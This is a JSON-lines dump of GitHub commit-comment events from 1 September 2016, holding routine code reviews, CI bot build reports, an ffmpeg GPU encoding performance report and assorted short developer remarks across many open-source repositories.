{"id":"4500565953","type":"CommitCommentEvent","actor":{"login":"Bjvanminnen"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":18858301,"position":25,"line":110,"path":"apps/src/blockTooltips/DropletAutocompletePopupTooltipManager.js","commit_id":"574ae3d69c41d688db60f88766e7b69104fbcb8d","created_at":"2016-09-01T05:35:34Z","updated_at":"2016-09-01T05:35:34Z","body":"Dredging up this old PR while investigating https://codeorg.axosoft.com/viewitem?id=93&type=features&force_use_number=true.\r\n\r\nI'm confused, since the comment says it's important that we bind to mousedown and not click, but then we call addClickTouchEvent instead off addMouseDownTouchEvent. Things seem to work if I change to the later. As it is, the click sometimes works and sometimes doesn't (haven't been able to figure out the difference).\r\n@bcjordan any insight?"}},"created_at":"2016-09-01T05:35:34Z"}
{"id":"4500568212","type":"CommitCommentEvent","actor":{"login":"Vishal0203"},"repo":{"name":"beautiful-code/mentorhub"},"payload":{"comment":{"id":18858305,"position":12,"line":12,"path":"app/assets/javascripts/angular/controllers/organization.js","commit_id":"707d575d3d7a3f6a72d73de1014f4e1e705a83cc","created_at":"2016-09-01T05:36:28Z","updated_at":"2016-09-01T05:36:28Z","body":"use common quotes. Since there are no special characters in the name, it is preferable to use double quotations. However, verify with other files to keep it constant. Notice that line number 3 has double quoutes."}},"created_at":"2016-09-01T05:36:28Z"}
{"id":"4500568281","type":"CommitCommentEvent","actor":{"login":"SebastianZ"},"repo":{"name":"w3c/svgwg"},"payload":{"comment":{"id":18858306,"position":5,"line":449,"path":"master/shapes.html","commit_id":"647dda4ab47be431cd4ef0522042d7246c232159","created_at":"2016-09-01T05:36:29Z","updated_at":"2016-09-01T05:36:29Z","body":"This should rather be `[ <a>&lt;number&gt;</a>+ ]#`.\r\n\r\nSebastian"}},"created_at":"2016-09-01T05:36:29Z"}
{"id":"4500572423","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18858314,"position":null,"line":null,"path":null,"commit_id":"5b5301a77f83c06a293b4a4d648dc799f7bbe3e5","created_at":"2016-09-01T05:38:11Z","updated_at":"2016-09-01T05:38:11Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1759 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-01T05:38:11Z"}
{"id":"4500572758","type":"CommitCommentEvent","actor":{"login":"ggnull35"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":18858315,"position":null,"line":null,"path":null,"commit_id":"99882d05a6635446d587ed51b095c627abc42587","created_at":"2016-09-01T05:38:17Z","updated_at":"2016-09-01T05:38:17Z","body":"Nvidia Pascal Titan X GPU can not reach to 50 fps on Main 10 P010LE HEVC encoding:\r\n\r\nffmpeg -loglevel verbose -i /media/usb1/4k_sampels/Samsung_SUHD_Picture_Quality\\ Demo_Nano_Crystal\\ Display_UK-Version.mp4 -c:v:0 nvenc_hevc -preset hp -cbr 1 -2pass 0 -r 50 -vb 28000k -minrate 28000k -maxrate 28000k -bufsize 28000k -muxrate 30000k -c:a:0 aac -b:a:0 192k -pix_fmt p010le 'udp://233.33.33.1:5001'\r\n\r\nFPS waves around 41-43 fps. If same command with YUV420P, it reaches to 120 - 130 fps.\r\n\r\nGPU NVENC Load:\r\n nvidia-smi dmon -i 0\r\n# gpu   pwr  temp    sm   mem   enc   dec  mclk  pclk\r\n# Idx     W     C     %     %     %     %   MHz   MHz\r\n    0    81    67     9     2    41     0  4513  1809\r\n    0    80    66     9     2    41     0  4513  1809\r\n    0    81    67     9     2    42     0  4513  1809\r\n    0    80    67    10     2    41     0  4513  1809\r\n    0    81    67     9     2    44     0  4513  1809\r\n\r\nI think bottleneck is not at GPU side, pixel convertion maybe needs speed up improvement."}},"created_at":"2016-09-01T05:38:17Z"}
{"id":"4500573925","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858317,"position":null,"line":null,"path":null,"commit_id":"ea5bfaccfcf6b947575a3fd48f0fdb49c15bff15","created_at":"2016-09-01T05:38:45Z","updated_at":"2016-09-01T05:38:45Z","body":"Related to: backdrop/backdrop-issues#2016 "}},"created_at":"2016-09-01T05:38:45Z"}
{"id":"4500574541","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18858319,"position":null,"line":null,"path":null,"commit_id":"4d14e3442079272e9c074a83c1e1444550a9ef5e","created_at":"2016-09-01T05:38:58Z","updated_at":"2016-09-01T05:38:58Z","body":"@HridayHS \r\nwarn: --force-broken, continuing to sync\r\nfatal: Couldn't find remote ref refs/heads/staging/cm-14.0-8916-caf\r\nUnexpected end of command stream\r\nfatal: Couldn't find remote ref refs/heads/staging/cm-14.0-8916-caf\r\nUnexpected end of command stream\r\nerror: Cannot fetch android_hardware_qcom_media\r\nwarn: --force-broken, continuing to sync\r\nerror: Cannot fetch android_hardware_qcom_display\r\nwarn: --force-broken, continuing to sync\r\nFetching projects: 100% (496/496)\r\nerror: Exited sync due to fetch errors\r\n"}},"created_at":"2016-09-01T05:38:58Z"}
{"id":"4500575285","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858321,"position":null,"line":null,"path":null,"commit_id":"0b1e8e217e723d7e8241569198694a3b968e54c8","created_at":"2016-09-01T05:39:16Z","updated_at":"2016-09-01T05:39:16Z","body":"Related to: backdrop/backdrop-issues#2016 "}},"created_at":"2016-09-01T05:39:16Z"}
{"id":"4500575793","type":"CommitCommentEvent","actor":{"login":"yabuchin"},"repo":{"name":"mono0926/nlp100-swift"},"payload":{"comment":{"id":18858323,"position":null,"line":null,"path":null,"commit_id":"480bd63f186af7fb15aa09878e4fdab5acde5324","created_at":"2016-09-01T05:39:27Z","updated_at":"2016-09-01T05:39:27Z","body":"👍 "}},"created_at":"2016-09-01T05:39:27Z"}
{"id":"4500576876","type":"CommitCommentEvent","actor":{"login":"mono0926"},"repo":{"name":"mono0926/nlp100-swift"},"payload":{"comment":{"id":18858324,"position":null,"line":null,"path":null,"commit_id":"480bd63f186af7fb15aa09878e4fdab5acde5324","created_at":"2016-09-01T05:39:53Z","updated_at":"2016-09-01T05:39:53Z","body":"ピリオド対応漏れました😡"}},"created_at":"2016-09-01T05:39:53Z"}
{"id":"4500579630","type":"CommitCommentEvent","actor":{"login":"sigovpaul"},"repo":{"name":"sigovpaul/thinknetica"},"payload":{"comment":{"id":18858332,"position":26,"line":20,"path":"lesson_2/products.rb","commit_id":"18ca3cf4e9879d5eec7f2d4d2e6e5561dc69c02f","created_at":"2016-09-01T05:40:56Z","updated_at":"2016-09-01T05:40:56Z","body":"@psylone видимо в процессе переделки получал какое то не то значение, поэтому привел к fixnum. Поправил"}},"created_at":"2016-09-01T05:40:56Z"}
{"id":"4500582294","type":"CommitCommentEvent","actor":{"login":"yabuchin"},"repo":{"name":"mono0926/nlp100-swift"},"payload":{"comment":{"id":18858335,"position":null,"line":null,"path":null,"commit_id":"335077088f542aa2a52dc29b790629e4c0667663","created_at":"2016-09-01T05:42:01Z","updated_at":"2016-09-01T05:42:01Z","body":"👍 "}},"created_at":"2016-09-01T05:42:01Z"}
{"id":"4500583090","type":"CommitCommentEvent","actor":{"login":"mono0926"},"repo":{"name":"mono0926/nlp100-swift"},"payload":{"comment":{"id":18858337,"position":null,"line":null,"path":null,"commit_id":"335077088f542aa2a52dc29b790629e4c0667663","created_at":"2016-09-01T05:42:20Z","updated_at":"2016-09-01T05:42:20Z","body":"(　´･‿･｀)"}},"created_at":"2016-09-01T05:42:20Z"}
{"id":"4500587883","type":"CommitCommentEvent","actor":{"login":"ggnull35"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":18858344,"position":null,"line":null,"path":null,"commit_id":"99882d05a6635446d587ed51b095c627abc42587","created_at":"2016-09-01T05:44:11Z","updated_at":"2016-09-01T05:44:11Z","body":"If codec changed to rawvideo to test pixel format convertion performance testing, FPS again waves around 39-40 fps"}},"created_at":"2016-09-01T05:44:11Z"}
{"id":"4500588943","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18858347,"position":5,"line":338,"path":"scene/2d/physics_body_2d.h","commit_id":"fc70824f7c6ab1944d54194f54b816e55671e177","created_at":"2016-09-01T05:44:35Z","updated_at":"2016-09-01T05:44:35Z","body":"Those physics changes would have been really better in a separate commit."}},"created_at":"2016-09-01T05:44:35Z"}
{"id":"4500589411","type":"CommitCommentEvent","actor":{"login":"strilliams"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":18858349,"position":null,"line":null,"path":null,"commit_id":"4b91faad4fb982b4761f5562bd9e1cb8c39136f6","created_at":"2016-09-01T05:44:47Z","updated_at":"2016-09-01T05:44:47Z","body":"Figure it out. Had created the imports directory within the client directory. 😂"}},"created_at":"2016-09-01T05:44:47Z"}
{"id":"4500589429","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas"},"payload":{"comment":{"id":18858350,"position":null,"line":null,"path":null,"commit_id":"93c9f7eb090d692bc29c0e587da6d6787b77fbe1","created_at":"2016-09-01T05:44:47Z","updated_at":"2016-09-01T05:44:47Z","body":"/cc @jcredding "}},"created_at":"2016-09-01T05:44:47Z"}
{"id":"4500594605","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18858357,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T05:46:44Z","updated_at":"2016-09-01T05:46:44Z","body":"Question why did you remove the above from CvCityStrategy"}},"created_at":"2016-09-01T05:46:44Z"}
{"id":"4500596475","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18858359,"position":5,"line":44,"path":"components/search-bar/index.web.tsx","commit_id":"a6e45bfad8903469714a342c1a3bccdeec0a0c90","created_at":"2016-09-01T05:47:23Z","updated_at":"2016-09-01T05:47:23Z","body":"onCancel 的 default 值要删掉，不然这里永远是 true 。"}},"created_at":"2016-09-01T05:47:23Z"}
{"id":"4500597496","type":"CommitCommentEvent","actor":{"login":"jasonweng"},"repo":{"name":"qor/admin"},"payload":{"comment":{"id":18858360,"position":5,"line":121,"path":"views/assets/javascripts/qor/qor-chooser.js","commit_id":"5c61e9bccd6ccd5fe76b14b76e6f27d8270d4b38","created_at":"2016-09-01T05:47:46Z","updated_at":"2016-09-01T05:47:46Z","body":"Two ';' "}},"created_at":"2016-09-01T05:47:46Z"}
{"id":"4500598671","type":"CommitCommentEvent","actor":{"login":"SebastianZ"},"repo":{"name":"w3c/svgwg"},"payload":{"comment":{"id":18858361,"position":5,"line":907,"path":"master/text.html","commit_id":"647dda4ab47be431cd4ef0522042d7246c232159","created_at":"2016-09-01T05:48:12Z","updated_at":"2016-09-01T05:48:12Z","body":"Nit: There should always be a space separating the square brackets from the types and keywords to improve readability.\r\n\r\nSo, with the note above and the [new percentage types](https://drafts.csswg.org/css-values-3/#typedef-length-percentage) taken into account, the syntax should look like this:\r\n\r\n    [[ <a>&lt;length-percentage&gt;</a> | <a>&lt;number&gt;</a>]+ ]#\r\n\r\nSebastian"}},"created_at":"2016-09-01T05:48:12Z"}
{"id":"4500599831","type":"CommitCommentEvent","actor":{"login":"tanmay3011"},"repo":{"name":"manishrawat0212/jqfundamentals"},"payload":{"comment":{"id":18858365,"position":5,"line":35,"path":"exercises/js/sandbox.js","commit_id":"fe698357a60d07c852872473353fd36c12dc8ce2","created_at":"2016-09-01T05:48:37Z","updated_at":"2016-09-01T05:48:37Z","body":"@manishrawat0212 Add text first then append. Currently, there are two DOM hits. Always try to have least number of DOM hits."}},"created_at":"2016-09-01T05:48:37Z"}
{"id":"4500600482","type":"CommitCommentEvent","actor":{"login":"SebastianZ"},"repo":{"name":"w3c/svgwg"},"payload":{"comment":{"id":18858368,"position":14,"line":985,"path":"master/text.html","commit_id":"647dda4ab47be431cd4ef0522042d7246c232159","created_at":"2016-09-01T05:48:52Z","updated_at":"2016-09-01T05:48:52Z","body":"Same as above, `[[ <a>&lt;length-percentage&gt;</a> | <a>&lt;number&gt;</a>]+ ]#`.\r\n\r\nSebastian"}},"created_at":"2016-09-01T05:48:52Z"}
{"id":"4500601551","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18858371,"position":21,"line":98,"path":"components/search-bar/index.web.tsx","commit_id":"a6e45bfad8903469714a342c1a3bccdeec0a0c90","created_at":"2016-09-01T05:49:17Z","updated_at":"2016-09-01T05:49:17Z","body":"showCancelButton 应该是受控属性，不输入内容也可能出现取消。"}},"created_at":"2016-09-01T05:49:17Z"}
{"id":"4500603114","type":"CommitCommentEvent","actor":{"login":"JohannesHoppe"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":18858378,"position":null,"line":null,"path":null,"commit_id":"16558ce736e36c26a6337633e8864f871cf63e0e","created_at":"2016-09-01T05:49:52Z","updated_at":"2016-09-01T05:49:52Z","body":":smile: Welcome!"}},"created_at":"2016-09-01T05:49:52Z"}
{"id":"4500604479","type":"CommitCommentEvent","actor":{"login":"umayanga123"},"repo":{"name":"umayanga123/scpp_android_node"},"payload":{"comment":{"id":18858381,"position":null,"line":null,"path":null,"commit_id":"31899d926c42304444ace3951bb79adf4abf3eac","created_at":"2016-09-01T05:50:27Z","updated_at":"2016-09-01T05:50:27Z","body":"\r\n![coin_value](https://cloud.githubusercontent.com/assets/7321656/18156732/0b0d7df4-7036-11e6-846f-7e6081ab7fd4.png)\r\n\r\n"}},"created_at":"2016-09-01T05:50:27Z"}
{"id":"4500607528","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18858384,"position":21,"line":98,"path":"components/search-bar/index.web.tsx","commit_id":"a6e45bfad8903469714a342c1a3bccdeec0a0c90","created_at":"2016-09-01T05:51:33Z","updated_at":"2016-09-01T05:51:33Z","body":"![](https://zos.alipayobjects.com/rmsportal/GYpalPBGQeFcMhH.PNG)"}},"created_at":"2016-09-01T05:51:33Z"}
{"id":"4500607775","type":"CommitCommentEvent","actor":{"login":"TrySound"},"repo":{"name":"rollup/rollup"},"payload":{"comment":{"id":18858385,"position":3,"line":2,"path":"bin/src/runRollup.js","commit_id":"3de477137ac14e3cac5ae5350d2e4e3728dc4d37","created_at":"2016-09-01T05:51:39Z","updated_at":"2016-09-01T05:51:39Z","body":"And what's the difference?"}},"created_at":"2016-09-01T05:51:39Z"}
{"id":"4500610452","type":"CommitCommentEvent","actor":{"login":"sfinktah"},"repo":{"name":"sfinktah/engine"},"payload":{"comment":{"id":18858391,"position":null,"line":null,"path":null,"commit_id":"5702b52b49ee776af1543fa7f7cd448a7f006828","created_at":"2016-09-01T05:52:40Z","updated_at":"2016-09-01T05:52:40Z","body":"Hahaha, well, shit, there you go... I imagine the problem was that sometimes under circumstances which I cannot duplicate here due to confidentiality agreements, effects/animations would continue forever, or at least the ... er... after-effects (like in a easing without a bounce).   Was nigh-on-impossible to debug the page because the dom elements kept being updated with slightly different floating point numbers and resetting cursor pos."}},"created_at":"2016-09-01T05:52:40Z"}
{"id":"4500611974","type":"CommitCommentEvent","actor":{"login":"mgherkar"},"repo":{"name":"mgherkar/my-project"},"payload":{"comment":{"id":18858396,"position":null,"line":null,"path":null,"commit_id":"4c13a280695d08ff81f8419b0adb8a3b921d5bde","created_at":"2016-09-01T05:53:15Z","updated_at":"2016-09-01T05:53:15Z","body":"new branch created"}},"created_at":"2016-09-01T05:53:15Z"}
{"id":"4500613673","type":"CommitCommentEvent","actor":{"login":"vxbinaca"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18858401,"position":null,"line":null,"path":null,"commit_id":"92c27a0dbf19eff211e7ffdd8db5895387e75529","created_at":"2016-09-01T05:53:55Z","updated_at":"2016-09-01T05:53:55Z","body":"@dstftw this change did something to Periscope where it's ripping the wrong channels content when theres no videos in the correct target channels listing. I've had this happen to me twice now.\r\n\r\nI use [Tubeup] (https://github.com/bibanon/tubeup) to archive videos, and when I try to rip [@HannahsWeedWorld] (https://www.periscope.tv/HannahWeedWorld/) on Periscope it's ripping [@ScottAdamsSays] (https://www.periscope.tv/ScottAdamsSays/) instead.\r\n\r\nHowever, only though Tubeup will it do this, I cannot replicate it with youtube-dl bare. I'm confident it's not my script doing it as it merely uses youtube-dl as a library and then uploads the result. Problem is, it's getting an incorrect result (videos) that are being pushed onto Archive.org and I have to halt Periscope archival and clean up this mess (a few hundred items tops) until this gets investigated and fixed.\r\n\r\nTo trigger this, when a channel has no videos, through Tubeup, Youtube-dl will pull for some reason another channels videos.\r\n\r\nI can post the batch file I'm using to do the rip work here if it would help."}},"created_at":"2016-09-01T05:53:55Z"}
{"id":"4500614419","type":"CommitCommentEvent","actor":{"login":"SebastianZ"},"repo":{"name":"w3c/svgwg"},"payload":{"comment":{"id":18858402,"position":23,"line":1059,"path":"master/text.html","commit_id":"647dda4ab47be431cd4ef0522042d7246c232159","created_at":"2016-09-01T05:54:12Z","updated_at":"2016-09-01T05:54:12Z","body":"Following the telcon resolution the correct syntax is `[ <a>&lt;number&gt;</a>+ ]#`.\r\n\r\nSebastian"}},"created_at":"2016-09-01T05:54:12Z"}
{"id":"4500617346","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-erubis"},"payload":{"comment":{"id":18858407,"position":null,"line":null,"path":null,"commit_id":"2dafe6b4122f8e87818b788ed6dd2f17df73d082","created_at":"2016-09-01T05:55:17Z","updated_at":"2016-09-01T05:55:17Z","body":"/cc @jcredding "}},"created_at":"2016-09-01T05:55:17Z"}
{"id":"4500617807","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-erubis"},"payload":{"comment":{"id":18858409,"position":null,"line":null,"path":null,"commit_id":"206e255a6fa1709e761cb8b2541cdfd487a102f9","created_at":"2016-09-01T05:55:26Z","updated_at":"2016-09-01T05:55:26Z","body":"/cc @jcredding "}},"created_at":"2016-09-01T05:55:26Z"}
{"id":"4500617979","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18858410,"position":null,"line":null,"path":null,"commit_id":"65fb1e5940155f503152a07b5033c327a9c87c09","created_at":"2016-09-01T05:55:30Z","updated_at":"2016-09-01T05:55:30Z","body":"Thanks hehe"}},"created_at":"2016-09-01T05:55:30Z"}
{"id":"4500619256","type":"CommitCommentEvent","actor":{"login":"magdeleineloaiza"},"repo":{"name":"magdeleineloaiza/hojadevida"},"payload":{"comment":{"id":18858413,"position":9,"line":3,"path":".gitignore","commit_id":"014a07a9f99e46ce8808d478e49821d2317c0344","created_at":"2016-09-01T05:56:01Z","updated_at":"2016-09-01T05:56:01Z","body":"j"}},"created_at":"2016-09-01T05:56:01Z"}
{"id":"4500619476","type":"CommitCommentEvent","actor":{"login":"BackSlasher"},"repo":{"name":"Flexget/Flexget"},"payload":{"comment":{"id":18858414,"position":11,"line":243,"path":"flexget/plugins/list/trakt_list.py","commit_id":"aaf1a69384586dc5bd18e42462693ac4d37b2bcb","created_at":"2016-09-01T05:56:06Z","updated_at":"2016-09-01T05:56:06Z","body":"1. What is a good indicator of an episode entry that isn't one of these? (Also, how can we add them to trakt without one of these?)\r\n2. What other entry types other than episode have these IDs?"}},"created_at":"2016-09-01T05:56:06Z"}
{"id":"4500620788","type":"CommitCommentEvent","actor":{"login":"Xuhailin16"},"repo":{"name":"Xuhailin16/hellow-world"},"payload":{"comment":{"id":18858418,"position":null,"line":null,"path":null,"commit_id":"78ed843e8b85350f5feafddf43c954a9b8d41e44","created_at":"2016-09-01T05:56:36Z","updated_at":"2016-09-01T05:56:36Z","body":"无"}},"created_at":"2016-09-01T05:56:36Z"}
{"id":"4500622399","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18858422,"position":null,"line":null,"path":null,"commit_id":"ee02cc0befbab1dc6207e8dda177184f9d5750b3","created_at":"2016-09-01T05:57:15Z","updated_at":"2016-09-01T05:57:15Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-01T05:57:15Z"}
{"id":"4500625803","type":"CommitCommentEvent","actor":{"login":"BackSlasher"},"repo":{"name":"Flexget/Flexget"},"payload":{"comment":{"id":18858433,"position":17,"line":249,"path":"flexget/plugins/list/trakt_list.py","commit_id":"aaf1a69384586dc5bd18e42462693ac4d37b2bcb","created_at":"2016-09-01T05:58:35Z","updated_at":"2016-09-01T05:58:35Z","body":"```\r\nepisode = {\r\n    'ids': get_entry_ids(entry)\r\n}\r\n```\r\n?\r\n:thumbsup:"}},"created_at":"2016-09-01T05:58:35Z"}
{"id":"4500626205","type":"CommitCommentEvent","actor":{"login":"cvium"},"repo":{"name":"Flexget/Flexget"},"payload":{"comment":{"id":18858434,"position":11,"line":243,"path":"flexget/plugins/list/trakt_list.py","commit_id":"aaf1a69384586dc5bd18e42462693ac4d37b2bcb","created_at":"2016-09-01T05:58:44Z","updated_at":"2016-09-01T05:58:44Z","body":"`trakt_episode_id` and `tvdb_id` are the only ids unique to episodes.\r\n\r\nTrakt API supports adding based on title (and optionally year)."}},"created_at":"2016-09-01T05:58:44Z"}
{"id":"4500631097","type":"CommitCommentEvent","actor":{"login":"yciabaud"},"repo":{"name":"feross/webtorrent-desktop"},"payload":{"comment":{"id":18858455,"position":null,"line":null,"path":null,"commit_id":"451d457426ebe478079b9d7f412f97974907f084","created_at":"2016-09-01T06:00:28Z","updated_at":"2016-09-01T06:00:28Z","body":"Yes in i18n I had to switch to use ids. It is much cleaner to reference the menus in this way than rely on the label."}},"created_at":"2016-09-01T06:00:28Z"}
{"id":"4500632524","type":"CommitCommentEvent","actor":{"login":"thundergolfer"},"repo":{"name":"thundergolfer/arXie-Bot"},"payload":{"comment":{"id":18858477,"position":null,"line":null,"path":null,"commit_id":"bef43b7d0e455e5ad787c30dd049450e2d2c760b","created_at":"2016-09-01T06:00:54Z","updated_at":"2016-09-01T06:00:54Z","body":"This commit is a rebase of 5 commits for which I did not correctly edit the commit message. "}},"created_at":"2016-09-01T06:00:54Z"}
{"id":"4500632802","type":"CommitCommentEvent","actor":{"login":"CurioZuk"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18858478,"position":null,"line":null,"path":null,"commit_id":"4d14e3442079272e9c074a83c1e1444550a9ef5e","created_at":"2016-09-01T06:01:00Z","updated_at":"2016-09-01T06:01:00Z","body":"change revision to refs/heads/staging/cm-14.0-caf-8916"}},"created_at":"2016-09-01T06:01:00Z"}
{"id":"4500632974","type":"CommitCommentEvent","actor":{"login":"halawa"},"repo":{"name":"Edraak/edx-ora2"},"payload":{"comment":{"id":18858479,"position":null,"line":null,"path":null,"commit_id":"330bdfeb080fd88723e1efd4f1ecc9d99d54717f","created_at":"2016-09-01T06:01:04Z","updated_at":"2016-09-01T06:01:04Z","body":"@devalih , which commits hold the sass changes responsible?"}},"created_at":"2016-09-01T06:01:04Z"}
{"id":"4500633640","type":"CommitCommentEvent","actor":{"login":"Iresha92"},"repo":{"name":"umayanga123/scpp_android_node"},"payload":{"comment":{"id":18858481,"position":null,"line":null,"path":null,"commit_id":"31899d926c42304444ace3951bb79adf4abf3eac","created_at":"2016-09-01T06:01:19Z","updated_at":"2016-09-01T06:01:19Z","body":"a great integration level. "}},"created_at":"2016-09-01T06:01:19Z"}
{"id":"4500634308","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18858484,"position":null,"line":null,"path":null,"commit_id":"4d14e3442079272e9c074a83c1e1444550a9ef5e","created_at":"2016-09-01T06:01:33Z","updated_at":"2016-09-01T06:01:33Z","body":"ya ik"}},"created_at":"2016-09-01T06:01:33Z"}
{"id":"4500634991","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18858492,"position":null,"line":null,"path":null,"commit_id":"4d14e3442079272e9c074a83c1e1444550a9ef5e","created_at":"2016-09-01T06:01:49Z","updated_at":"2016-09-01T06:01:49Z","body":"i was informing him"}},"created_at":"2016-09-01T06:01:49Z"}
{"id":"4500635018","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18858493,"position":null,"line":null,"path":null,"commit_id":"a4454aa02c189959cebc49a32cd256c5672f9879","created_at":"2016-09-01T06:01:49Z","updated_at":"2016-09-01T06:01:49Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2307 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a4454aa02c189959cebc49a32cd256c5672f9879-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a4454aa02c189959cebc49a32cd256c5672f9879-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T06:01:49Z"}
{"id":"4500637088","type":"CommitCommentEvent","actor":{"login":"CurioZuk"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18858496,"position":null,"line":null,"path":null,"commit_id":"4d14e3442079272e9c074a83c1e1444550a9ef5e","created_at":"2016-09-01T06:02:33Z","updated_at":"2016-09-01T06:02:33Z","body":"k"}},"created_at":"2016-09-01T06:02:33Z"}
{"id":"4500637840","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858497,"position":null,"line":null,"path":null,"commit_id":"ae0a6897d44de98464f59cfb88c747a142a7d2b1","created_at":"2016-09-01T06:02:49Z","updated_at":"2016-09-01T06:02:49Z","body":"Related to: backdrop/backdrop-issues#2109 "}},"created_at":"2016-09-01T06:02:49Z"}
{"id":"4500639363","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858501,"position":null,"line":null,"path":null,"commit_id":"c6c1d496a557ffd08cbb5e2c51e3c64d74d31102","created_at":"2016-09-01T06:03:22Z","updated_at":"2016-09-01T06:03:22Z","body":"Related to: backdrop/backdrop-issues#2109 "}},"created_at":"2016-09-01T06:03:22Z"}
{"id":"4500641121","type":"CommitCommentEvent","actor":{"login":"BackSlasher"},"repo":{"name":"Flexget/Flexget"},"payload":{"comment":{"id":18858504,"position":11,"line":243,"path":"flexget/plugins/list/trakt_list.py","commit_id":"aaf1a69384586dc5bd18e42462693ac4d37b2bcb","created_at":"2016-09-01T06:03:57Z","updated_at":"2016-09-01T06:03:57Z","body":"@cvium \r\n1. OK, I can remove all other \"indicators\". Thanks.\r\n2. The current code doesn't work for episodes for me. Does it for you? Also, I worked according to the [docs](http://docs.trakt.apiary.io/#reference/sync/remove-playback/add-items-to-collection). They might be hiding it, but the example they have there is via unique identifiers."}},"created_at":"2016-09-01T06:03:57Z"}
{"id":"4500641458","type":"CommitCommentEvent","actor":{"login":"BelminSalkica"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18858505,"position":null,"line":null,"path":null,"commit_id":"8c3178b50ba36d25e4767d1e4fbbb2cd89da7594","created_at":"2016-09-01T06:04:05Z","updated_at":"2016-09-01T06:04:05Z","body":"Na tutorialu (http://goo.gl/rIQUdl)  piše da bi se trebal slike učitati ali meni na simulatoru ne učita ništa  samo bijel ekran http://imgur.com/KUxYxzq, a prije učitavanja slika je bio makar table view.."}},"created_at":"2016-09-01T06:04:05Z"}
